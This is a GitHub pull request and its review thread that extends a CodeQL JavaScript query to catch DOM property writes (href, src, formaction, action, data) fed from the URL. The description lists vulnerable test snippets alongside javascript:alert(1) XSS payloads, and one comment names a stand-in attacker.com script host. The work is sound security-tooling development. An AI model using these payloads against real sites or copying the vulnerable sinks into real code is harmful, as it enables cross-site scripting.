### PR TITLE
[js/client-side-unvalidated-url-redirection] add interpretsValueAsJavaScript predicate

### PR DESCRIPTION
**Pull request by Raz0r**
Hi!

The [predicate](https://github.com/github/codeql/blob/master/javascript/ql/src/semmle/javascript/security/dataflow/DOM.qll#L62) `interpretsArgumentsAsHTML` catches sinks that use `setAttribute()`, e.g.

```js
var payload = document.location.search.substr(1);
var el = document.createElement("input");
el.setAttribute("formaction", payload);
document.body.appendChild(el);
```

However it misses direct assignment, e.g. `el.formaction = payload`. This PR adds a new predicate `interpretsValueAsJavaScript` and covers the following cases:

```js
var payload = document.location.search.substr(1);
var el = document.createElement("a");
el.href = payload;
document.body.appendChild(el);

// <a href="javascript:alert(1)">XSS</a>
```

```js
var payload = document.location.search.substr(1);
var el = document.createElement("button");
el.formaction = payload;
document.body.appendChild(el);

// <form><button formaction=javascript:alert(1)>XSS
```

```js
var payload = document.location.search.substr(1);
var el = document.createElement("embed");
el.src = payload;
document.body.appendChild(el);

// <embed src="javascript:alert(1)">
```

```js
var payload = document.location.search.substr(1);
var el = document.createElement("form");
el.action = payload;
document.body.appendChild(el);

// <form action=javascript:alert(1)><input type=submit value=XSS>
```

```js
var payload = document.location.search.substr(1);
var el = document.createElement("frame");
el.src = payload;
document.body.appendChild(el);

// <frame src="javascript:alert(1)">
```

```js
var payload = document.location.search.substr(1);
var frame = document.createElement("iframe");
frame.src = payload;
document.body.appendChild(frame);

// <iframe src="javascript:alert(1)">
```

```js
var payload = document.location.search.substr(1);
var el = document.createElement("input");
el.formaction = payload;
document.body.appendChild(el);

// <form><input type=submit formaction=javascript:alert(1) value=XSS>
```

```js
var payload = document.location.search.substr(1);
var el = document.createElement("isindex");
el.action = payload;
document.body.appendChild(el);

// <isindex type=submit action=javascript:alert(1)>
```

```js
var payload = document.location.search.substr(1);
var el = document.createElement("isindex");
el.formaction = payload;
document.body.appendChild(el);

// <isindex type=submit formaction=javascript:alert(1)>
```

```js
var payload = document.location.search.substr(1);
var el = document.createElement("object");
el.data = payload;
document.body.appendChild(el);

// <object data="javascript:alert(1)">
```

```js
var payload = document.location.search.substr(1);
var el = document.createElement("script");
el.src = payload;
document.body.appendChild(el);

// <script src="data:text/javascript,alert(1)"></script>
```

### CODE REVIEW

**Comment by asgerf** [comment]
Hi @Raz0r,

Thanks for making the PR with this.

One of the complications we run into here is that these sinks are only relevant when the attacker controls the scheme or hostname of the URL, which typically means they have to control the beginning of the string. Controlling something at the end of the URL won't work, for example,
```js
setAttribute("href", "https://google.com?q=" + payload)
```
does not cause XSS. The `js/xss` query is mainly for sinks that interpret the input as HTML, not as a URL.

We usually put such sinks in the `ClientSideUrlRedirect` query, which I admit can seem confusing at first, but URLs are different enough from HTML that we want to handle them separately. That query considers the suffix of a string to be sanitized if it can't affect the hostname, so some of the sinks would be more suitable in that query.

Some suggestions if you'd like to continue with this PR:
- Test these sinks with `ClientSideUrlRedirect` as well.
- When control over the hostname is sufficient to get XSS, focus on making `ClientSideUrlRedirect` find them.
- Try adding subclasses of `DOM::AttributeDefinition` for assignments to a property where the base is a `domValueRef()`.

**Comment by Raz0r** [comment]
@asgerf thank you for heads up. `ClientSideUrlRedirect` indeed seems confusing, because there is no redirect actually. I tried `ClientSideUrlRedirect.ql` against test cases above, and none of them are detected at the moment, I will try to fix it as per your suggestions. By the way, the following test case with a static prefix is detected as Cross Site Scripting by `Xss.ql`:

```js
var payload = document.location.search.substr(1);
var el = document.createElement("script");
el.setAttribute("src", "https://google.com/" + payload);
document.body.appendChild(el);
```

**Comment by Raz0r** [comment]
@asgerf I moved the check to `ClientSideUrlRedirectCustomizations.qll`, however I still think that `DomPropWriteNode` is a suitable place for the new predicate as it checks that the attribute is actually written to the DOM object as was mentioned by you. All the test cases are are now detected by `ClientSideUrlRedirect.ql`. Additional tests:

```js
var payload = document.location.search.substr(1);
var el = document.createElement("script");
el.src = "http://" + payload;
document.body.appendChild(el);

// <script src="http://attacker.com/evil.js"></script>
```
Untrusted URL redirection is reported (protocol is not controlled, host is controlled)

```js
var payload = document.location.search.substr(1);
var el = document.createElement("script");
el.src = "https://google.com/" + payload;
document.body.appendChild(el);
```
Untrusted URL redirection is not reported (protocol and host are not controlled)

**Comment by asgerf** [comment]
With this change we started flagging FPs such as [this line](https://github.com/ampproject/amphtml/blob/3c26606ae9777a2b830d62bf0008be257936fab4/examples/analytics-iframe-transport-remote-frame.html#L39), which isn't exactly the fault of this PR, but it does mean we have to hold back on merging for a bit. I've put up https://github.com/github/codeql/pull/3892 to add the needed sanitizer.

Lastly, we're running into vacation season which means frequency of review will slow down significantly. I just want to say that we do appreciate the contribution, but it may take a while before this PR can be merged.

**Comment by Raz0r** [comment]
@asgerf I am perfectly fine with this, thank you.

File: javascript/ql/src/semmle/javascript/security/dataflow/ClientSideUrlRedirectCustomizations.qll [hunk 1]
```diff
@@ -145,4 +145,17 @@ module ClientSideUrlRedirect {
       )
     }
   }
+  
+  /**
+   * A write of an attribute which may execute JavaScript code or
```
Comment (erik-krogh) [inline javascript/ql/src/semmle/javascript/security/dataflow/ClientSideUrlRedirectCustomizations.qll:150]:
```suggestion

  /**
   * A write of an attribute which may execute JavaScript code or
```

Our autoformatter doesn't like trailing whitespace. With this change all our CI checks should pass.

**Comment by Raz0r** [comment]
@erik-krogh thank you for the update. To be honest, I am not sure how `.expected` file is generated, if you have any tutorial on writing tests I would love to see it.

**Comment by erik-krogh** [comment]
> @erik-krogh thank you for the update. To be honest, I am not sure how `.expected` file is generated, if you have any tutorial on writing tests I would love to see it.

There is some documentation here: https://help.semmle.com/codeql/codeql-cli/procedures/test-queries.html    
However, that documentation assumes that you are writing a new custom query.  

The commands you'll need are [`codeql test run`](https://help.semmle.com/codeql/codeql-cli/commands/test-run.html) and [`codeql test accept`](https://help.semmle.com/codeql/codeql-cli/commands/test-accept.html). 

Here is a procedure you can follow for this PR: 
 - Create a new `.js` file in [this folder](https://github.com/github/codeql/tree/master/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect), and add some examples for the test. 
 - Make sure to add both examples that should be flagged, and examples that shouldn't be flagged (e.g. include something similar to [this FP](https://github.com/ampproject/amphtml/blob/3c26606ae9777a2b830d62bf0008be257936fab4/examples/analytics-iframe-transport-remote-frame.html#L39) that was fixed by https://github.com/github/codeql/pull/3892). 
 - global variables can mess up your test, so it can be a good idea to put your test code inside a function ([example](https://github.com/github/codeql/blob/master/javascript/ql/test/query-tests/Security/CWE-601/ClientSideUrlRedirect/tst2.js)) 
 - (We usually comment `// NOT OK` next to code that should be flagged by the query, and `// OK` next to could that shouldn't be flagged. )
 - run `codeql test run [path to ClientSideUrlRedirect.qlref]`
 - The output from `codeql test run ..` shows the difference between the expected and the actual result. For path-queries you only have to worry about the changes below "`#select`" in the `.expected` file. 
 - If the difference looks OK, then you can run `codeql test accept [path to ClientSideUrlRedirect.qlref]` to update the `.expected` file. 

If you don't have the `codeql` CLI setup, then you can also do the same things from inside VS Code. 
Find the `ClientSideUrlRedirect` test from the test explorer, and press the triangle to run it.  
You can afterwards inspect the difference (and accept it) by right-clicking on the test in the test explorer.

**Comment by Raz0r** [comment]
@erik-krogh thank you for detailed explanation, added the tests.

**Comment by erik-krogh** [comment]
[A performance evaluation](https://git.semmle.com/erik/dist-compare-reports/tree/profiling-js-esben.northeurope.cloudapp.azure.com_1594203018625) (internal link), shows that the performance is effectively unchanged, and the spurious FPs are gone.

**Pull request merged**